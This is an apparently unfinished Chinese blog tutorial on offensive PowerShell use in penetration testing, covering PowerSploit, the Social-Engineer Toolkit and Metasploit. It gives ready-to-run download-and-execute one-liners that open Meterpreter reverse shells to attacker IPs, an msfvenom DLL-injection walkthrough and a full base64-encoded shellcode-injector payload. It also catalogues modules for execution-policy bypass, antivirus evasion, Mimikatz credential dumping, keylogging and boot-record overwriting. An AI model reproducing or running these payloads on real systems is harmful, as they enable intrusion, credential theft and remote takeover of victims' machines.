挖个坑慢慢填,明年应该能写完。。

PowerShell在渗透中的优势:

• Win7以上系统默认安装
• PowerShell脚本可以运行在内存中
• 几乎不会触发杀毒软件
• 可以调用.NET类
• 利用用户口令(查询活动目录)
• 可以用来管理活动目录
• 远程执行PowerShell脚本
• 使Windows脚本攻击更加容易

---

小技巧

---

参数

• -Exec Bypass:绕过执行安全保护

这个参数非常重要,默认PowerShell的安全策略不允许运行命令和文件，通过这个参数可以绕过任何一个安全保护规则

• -Nonl:非交互模式,PowerShell不提供用户交互式提示符

• -NoProfile或者-NoP:Powershell不加载当前用户的配置

• -noexit:执行后不退出shell,对于键盘记录这类脚本非常重要

• -W Hidden:设置窗口，将命令窗口保持隐藏

---

命令

下载并执行脚本

从服务器上下载PowerShell脚本,并执行脚本

powershell "-NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters]"

如下载并执行Meterpreter PowerShell脚本

powershell "-NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.2 -Lport 80"

下载并执行文件

在本地执行文件

powershell -NoP -Nonl -W Hidden -Exec Bypass -Command "& {Import-Module[Path and File of PowerShell];[Parameters]}"

运行和编码PowerShell脚本

如使用base64编码PowerShell脚本

powershell -NoP -NonI -W Hidden -Exec Bypass -enc[Base64 Code]

PowerShell脚本利用工具

• Powersploit
• Nishang
• Easy-P
• SET
• Metasploit

Powersploit

PowerSploit是Microsoft PowerShell模块的集合，可用于在评估的所有阶段帮助渗透测试人员。
PowerSploit由以下模块和脚本组成：

CodeExecution

下载脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.102.1/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")

用metasploit生成一个dll文件

sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.102.1 lport=4444 -f dll -o /var/www/html/PowerSploit/test.dll

然后我们去下载下来这个dll文件

IEX (New-Object Net.WebClient).DownloadString("http://192.168.102.1/PowerSploit/test.dll")（不可用此方法下载，需手动下载）
刚刚注入进程的时候我们就启动了一个新的进程，这次我们就注入到现有的进程中
我们就注入到3632这个进程中，

Invoke-DllInjection -ProcessID 3632 -Dll .\test.dll

注意切换模块，我们用的是reverse_tcp这个payload

切换完成，开始监听，这边执行

ScriptModification

修改和/或准备要在受损机器上执行的脚本。

Out-EncodedCommand

压缩，Base-64编码，并为PowerShell有效负载脚本生成命令行输出。

Out-CompressedDll

压缩，Base-64编码，并输出生成的代码来加载内存中的受管dll。

Out-EncryptedScript

加密文本文件/脚本。

Remove-Comments

从脚本中删除注释和额外的空白。

Persistence

将持久性功能添加到PowerShell脚本

New-UserPersistenceOption

为添加持久性功能配置用户级别的持久性选项。

New-ElevatedPersistenceOption

为“添加持久性”功能配置提升的持久性选项。

Add-Persistence

将持久性功能添加到脚本。

Install-SSP

安装安全支持提供程序（SSP）dll。

Get-SecurityPackages

枚举所有加载的安全软件包（SSP）。

AntivirusBypass

Antivirus并没有对抗PowerShell的机会！
Find-AntivirusSignature
使用与“class101”中的DSplit相同的方法定位单个字节Antivirus签名。

Exfiltration

你所有的数据都属于我！

Invoke-TokenManipulation

列出可用的登录标记。与其他用户登录令牌创建进程，并模拟当前线程中的登录令牌。

Invoke-CredentialInjection

使用明文凭据创建登录而不触发可疑事件ID 4648（显式凭据登录）。

Invoke-NinjaCopy

通过读取原始卷并解析NTFS结构来复制NTFS分区卷中的文件。

Invoke-Mimikatz

使用PowerShell在内存中反射加载Mimikatz 2.0。可用于转储凭据而不写入任何内容到磁盘。可以用于Mimikatz提供的任何功能。

Get-Keystrokes

记录按键，时间和活动窗口。

Get-GPPPassword

检索通过组策略首选项推送的帐户的明文密码和其他信息。

Get-GPPAutologon

如果通过组策略首选项推送，则从registry.xml中检索自动登录用户名和密码。

Get-TimedScreenshot

一种以固定间隔拍摄屏幕截图并将其保存到文件夹的功能。

New-VolumeShadowCopy

创建新卷卷影副本。

Get-VolumeShadowCopy

列出所有本地卷影副本的设备路径。

Mount-VolumeShadowCopy

装入卷影副本。

Remove-VolumeShadowCopy

删除卷影副本。

Get-VaultCredential

显示Windows Vault凭证对象，包括明文Web凭证。

Out-Minidump

生成进程的全内存小型转储。

'GET-MicrophoneAudio'

从系统麦克风录制音频并保存到磁盘

Mayhem

造成PowerShell的普遍混乱。

Set-MasterBootRecord

概念验证码，用您选择的信息覆盖主引导记录。

Set-CriticalProcess

退出PowerShell后，机器会蓝屏。

Privesc

帮助提升目标权限的工具。

PowerUp

清除共同特权升级检查的房子，以及一些武器载体。

Privesc

帮助进行渗透测试侦察阶段的工具。

Invoke-Portscan

是否使用常规套接字进行简单端口扫描，基于（漂亮）nmap上的宽松。

Get-HttpStatus

当提供字典文件时，返回指定路径的HTTP状态代码和完整URL。

Invoke-ReverseDnsLookup

扫描DNS PTR记录的IP地址范围。

PowerView

PowerView是执行网络和Windows域枚举和利用的一系列功能。

Recon

用于帮助进行渗透测试侦察阶段的字典集合。字典来自以下来源。

admin.txt - http://cirt.net/nikto2/
generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/

Recon\Dictionaries

除非另有明确说明，否则PowerSploit项目和所有单独脚本均受BSD 3-Clause许可。

用法

有关详细的使用信息，请参阅每个脚本中基于注释的帮助。

要安装此模块，请将整个PowerSploit文件夹放入其中一个模块目录中。$ Env：PSModulePath 环境变量中列出了默认的PowerShell模块路径。

默认的每用户模块路径为：“$ Env：HomeDrive $ Env：HOMEPATH \ Documents \ WindowsPowerShell \ Modules” 默认的计算机级模块路径为：“$ Env：windir \ System32 \ WindowsPowerShell \ v1.0 \ Modules”`

要使用该模块，请键入

Import-Module PowerSploit

要查看导入的命令，请键入

Get-Command -Module PowerSploit

如果您正在运行PowerShell v3并且想要删除令人讨厌的“您是否真的想运行从Internet下载的脚本”警告，那么一旦您将PowerSploit放入模块路径中，请运行以下单行命令：

$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerSploit) ) {Get-ChildItem $_ -Recurse | Unblock-File} }

为了获得每个单独命令的帮助，Get-Help是你的朋友。

注意：这个模块中包含的工具全都设计成可以单独运行。将它们包含在模块中简单地增加了便携性。

Nishang

Easy-P

SET

SET的PowerShell攻击payload在Social-Engineering Attacks->Powershell Attack Vectors选项中

运行SET:

sudo setookit

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 

输入1选择Social-Engineering Attacks

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

输入9选择Powershell Attack Vectors

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

  99) Return to Main Menu

这4个选项使用方法都很简单区别是1会直接生成PowerShell一句话反弹的payload，而2和3会生成powershell脚本，需要目标下载执行

Powershell Alphanumeric Shellcode Injector

输入1选择Powershell Alphanumeric Shellcode Injector

然后输入回连的lhost和lport(默认443),payload是meterpreter的reverse_https

set:powershell>1
Enter the IPAddress or DNS name for the reverse host: 192.168.1.1
set:powershell> Enter the port for the reverse [443]:4455
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 355 bytes
Final size of c file: 1516 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : 

生成完成后会询问是否启动监听(msf的handler)

生成完成之后会将payload以txt格式保存到/root/.set/reports/powershell/目录下

如样例中的payload为:

powershell -w 1 -C "sv vC -;sv b ec;sv ui ((gv vC).value.toString()+(gv b).value.toString());powershell (gv ui).value.toString() 'JABTAFkAIAA9ACAAJwAkAEYAeAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAFUAWgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEYAeAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABVAFoAeAAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA2ADcALAAwAHgAMQAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4ADkAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgANAA2ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgANgBjACwAMAB4ADQANQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMAMgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMAAwADsAJAB1AEgAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAVQBaAHgALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAdQBIACAAPQAgACQAVQBaAHgALgBMAGUAbgBnAHQAaAB9ADsAJABNAGsAPQAkAFUAWgA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHUASAAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEwASAA9ADAAOwAkAEwASAAgAC0AbABlACAAKAAkAFUAWgB4AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEwASAArACsAKQAgAHsAJABVAFoAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAGsALgBUAG8ASQBuAHQAMwAyACgAKQArACQATABIACkALAAgACQAVQBaAHgAWwAkAEwASABdACwAIAAxACkAfQA7ACQAVQBaADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAGsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAHQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTAFkAKQApADsAJABPAHMAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcwBDACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHMAQwAgACQATwBzACAAJAB0AHcAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQATwBzACAAJAB0AHcAIgA7AH0A'"

在目标主机执行payload即可在监听机器收到反弹shell(前提启动了监听)

Powershell Reverse Shell

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

  99) Return to Main Menu

set:powershell>2
Enter the IPAddress or DNS name for the reverse host: 192.168.1.1
set:powershell> Enter the port for listener [443]:4455
[*] Rewriting the powershell reverse shell with options
[*] Exporting the powershell stuff to /root/.set/reports/powershell
set> Do you want to start a listener [yes/no]: yes
Listening on 0.0.0.0:4455

执行完成后会将ps1脚本以txt格式输出到/root/.set/reports/powershell/powershell.reverse.txt中

执行mv powershell.reverse.txt powershell.reverse.ps1将其重命名为ps1文件

在目标主机执行该文件即可在Parrot的监听器中收到CMD shell

Metasploit

Payload

msf中有8种powershell payload，分别为:

   payload/cmd/windows/powershell_bind_tcp                                         normal     Windows Interactive Powershell Session, Bind TCP
   payload/cmd/windows/powershell_reverse_tcp                                      normal     Windows Interactive Powershell Session, Reverse TCP
   payload/cmd/windows/reverse_powershell                                          normal     Windows Command Shell, Reverse TCP (via Powershell)
   payload/windows/powershell_bind_tcp                                             normal     Windows Interactive Powershell Session, Bind TCP
   payload/windows/powershell_reverse_tcp                                          normal     Windows Interactive Powershell Session, Reverse TCP
   payload/windows/x64/powershell_bind_tcp                                         normal     Windows Interactive Powershell Session, Bind TCP
   payload/windows/x64/powershell_reverse_tcp                                      normal     Windows Interactive Powershell Session, Reverse TCP

单纯生成Payload和接收shell可以参考Metasploit基础使用中的msfvenom和handler使用方法

使用msf注入powershell代码

使用前提是你已经拿到了session，需要使用powershell脚本去完成其他的工作

msf > use post/windows/manage/exec_powershell
msf post(windows/manage/exec_powershell) > show options

Module options (post/windows/manage/exec_powershell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SCRIPT                    yes       Path to the local PS script or command string to execute
   SESSION                   yes       The session to run this module on.

msf post(windows/manage/exec_powershell) > 

擦边分享一下关于PowerShell的书：
《Windows PowerShell实战指南（第2版）》[美]道·琼斯（作者）epub+mobi+azw3

http://mebook.cc/19091.html